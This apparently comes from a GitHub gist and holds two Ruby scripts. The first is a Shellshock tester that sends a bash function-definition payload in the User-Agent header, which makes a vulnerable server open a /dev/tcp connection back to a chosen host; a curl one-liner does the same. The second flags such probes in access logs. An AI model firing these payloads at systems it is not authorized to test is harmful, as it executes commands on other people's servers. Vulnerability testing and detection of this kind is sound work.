Gist rabbitt/1e002d340df411fa8832 (last active October 13, 2017 17:33)
Shellshock Remote Server Vulnerability Tester
```ruby
#!/usr/bin/env ruby
=begin
This is equivalent to running the following from the command line:

curl -H 'User-Agent: () { :; }; exec 3<>/dev/tcp/www.receiver-host.com/80; echo -e "GET / HTTP/1.0\nHost: www.receiver-host.com\nUser-Agent: shellshock\nReferer: vulnerable\n\n" >&3; cat <&3' https://some.host.that.might.be.vulnerable.com -o/dev/null -s

To use this, do the following:

1. log into a webserver you control and have access to the access logs of, say: www.foo.com
2. tail the access log file: tail -f access_log | grep vulnerable
   (the callback request sends "User-Agent: shellshock" and "Referer: vulnerable",
   so those are the strings that will actually appear in your access log)
3. download this script and make it executable
4. run the script against a target server, say: www.bar.com
   ./shellshocked -t http://www.bar.com -w www.foo.com
5. check the tailing of your logs - if you see an entry pop up with "vulnerable" as the referer .. well.. update bash.

Note: this script is pretty limited. Feel free to augment.
=end

require 'open-uri'
require 'ostruct'
require 'optparse'

options = OpenStruct.new(target: nil, webserver: nil)

OptionParser.new("Usage: #{File.basename($0)} [options]") do |parser|
  parser.separator ''
  parser.separator 'Connection Options:'
  parser.on('-t', '--target URL', String, %Q|Host to test for shellshocked vulnerability.|) { |v| options.target = v }
  parser.on('-w', '--webserver FQDN', String, %Q|FQDN of where to send the GET request during vulnerability test (only supports non-ssl currently).|) { |v| options.webserver = v }
  parser.separator ''
  parser.separator 'General'
  parser.on_tail('-h', '--help', 'This message') { puts parser.help; exit! 0 }
  parser.parse!

  unless options.target and options.webserver
    puts "missing target and webserver options!"
    puts parser.help
    exit 1
  end
end

# The test string is a bash function definition "() { :; }" followed by commands.
# On an unpatched bash the commands after the definition run when the header is
# imported into the environment (e.g. by a CGI handler); here they just make a
# plain HTTP GET back to the -w webserver so the probe shows up in its access log.
payload = []
payload << '() { :; }'
payload << "exec 3<>/dev/tcp/#{options.webserver}/80"
payload << %Q|echo -e "GET / HTTP/1.0\\nHost: #{options.webserver}\\nUser-Agent: shellshock\\nReferer: vulnerable\\n\\n" >&3|
payload << 'cat <&3'

puts "Sending payload of:\n User-Agent: #{payload.join('; ')}"

begin
  # URI.open from open-uri (the bare Kernel#open override it used to install was
  # removed in Ruby 3.0); the hash argument sets the request headers.
  URI.open(options.target, 'User-Agent' => payload.join('; '))
rescue OpenURI::HTTPError => e
  puts "Got error back - maybe successful?"
  puts e.message
end
```
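The other side of the same check is spotting these probes in your own logs. The following Ruby script is an added detection example, not part of rabbitt's gist: it parses access-log lines and flags any request line, Referer or User-Agent that carries the bash function-definition prefix `() {` with which the tester's payload begins. It assumes the Apache/nginx combined log format, uses constructed sample lines, and also percent-decodes the request line, since the same prefix can arrive URL-encoded in a query string and would otherwise be missed.

```ruby
#!/usr/bin/env ruby
# Added detection example (not part of the gist): flag Shellshock-style probes
# in web-server access logs by looking for the bash function-definition prefix
# "() {" that the tester's User-Agent header starts with.
require 'uri'

# "() {" with optional whitespace between the parentheses and the brace.
SHELLSHOCK_RE = /\(\)\s*\{/

# Apache/nginx "combined" log format (assumed):
#   ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<request>[^"]*)" (?<status>\d{3}) (?<bytes>\S+) "(?<referer>[^"]*)" "(?<agent>[^"]*)"\z/

# Parse one combined-format line into a hash, or nil if it does not parse.
def parse_log_line(line)
  m = LOG_RE.match(line.strip)
  return nil unless m
  { ip: m[:ip], time: m[:time], request: m[:request], status: m[:status].to_i,
    referer: m[:referer], agent: m[:agent] }
end

# Percent-decode a field so an encoded "%28%29%20%7B" in a query string is seen too;
# malformed escapes fall back to the raw string rather than aborting the scan.
def decoded(value)
  URI.decode_www_form_component(value)
rescue ArgumentError
  value
end

# Names of the fields in a parsed entry that carry the Shellshock prefix.
def shellshock_fields(entry)
  %i[request referer agent].select do |field|
    raw = entry[field].to_s
    SHELLSHOCK_RE.match?(raw) || SHELLSHOCK_RE.match?(decoded(raw))
  end
end

# Scan log lines; return the parsed entries that matched, each tagged with
# the fields that triggered. Unparseable lines are skipped.
def scan_log(lines)
  lines.each_with_object([]) do |line, hits|
    entry = parse_log_line(line)
    next unless entry
    fields = shellshock_fields(entry)
    hits << entry.merge(matched_fields: fields) unless fields.empty?
  end
end

# Constructed sample lines: one hit in User-Agent (the shape of the gist's own
# payload), one clean request, one hit hidden in a percent-encoded query string.
SAMPLE_LOG = <<~LOG
  203.0.113.5 - - [10/Oct/2017:10:00:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :; }; exec 3<>/dev/tcp/www.foo.com/80; cat <&3"
  198.51.100.7 - - [10/Oct/2017:10:00:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
  192.0.2.9 - - [10/Oct/2017:10:00:03 +0000] "GET /cgi-bin/test.cgi?x=%28%29%20%7B%20%3A%3B%7D%3B HTTP/1.1" 404 162 "-" "curl/7.54.0"
LOG

if __FILE__ == $0
  scan_log(SAMPLE_LOG.lines).each do |hit|
    puts "#{hit[:time]} #{hit[:ip]} shellshock pattern in #{hit[:matched_fields].join(',')}: #{hit[:request]}"
  end
end
```

On the sample input the first and third lines are reported (User-Agent and decoded request line respectively) and the plain browser request is not. To run it over a real log, replace `SAMPLE_LOG.lines` with `File.foreach(path)`; note that a `404` on the probed CGI path, as in the third sample line, still means the header reached the server and is worth recording.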